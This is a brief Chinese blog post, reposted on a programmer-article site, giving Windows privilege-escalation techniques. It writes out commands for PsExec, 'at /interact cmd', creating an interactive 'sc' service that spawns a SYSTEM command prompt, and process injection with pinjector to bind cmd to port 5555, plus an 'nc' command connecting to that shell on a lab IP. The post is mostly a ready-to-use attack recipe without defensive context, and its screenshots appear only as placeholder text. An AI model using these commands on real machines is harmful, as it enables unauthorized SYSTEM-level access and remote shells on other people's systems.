欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

windows提权

程序员文章站 2022-07-15 13:09:33
...
  • PsExec
  • at
  • Process_Injector
  • sc

psexec

当前用户是jh
windows提权
提权之后
windows提权


*at命令提权(适用于xp,2003)

at 15:05 /interact cmd  

windows提权


sc

创建服务(打开cmd命令窗口的服务)

    sc Create systemcmd binPath= "cmd /K start" type= own type= interact

启动服务刚才创建的服务

    sc start systemcmd

process_injector

列出当前的所有进程

pinjector.exe -l

windows提权

选择要提权成的用户,进行进程注入

pinjector.exe -p 732 cmd 5555   #服务端实现进程注入
nc -nv 10.10.10.19 5555    # 客户端连接服务端

windows提权

转载于:https://blog.51cto.com/13155409/2154920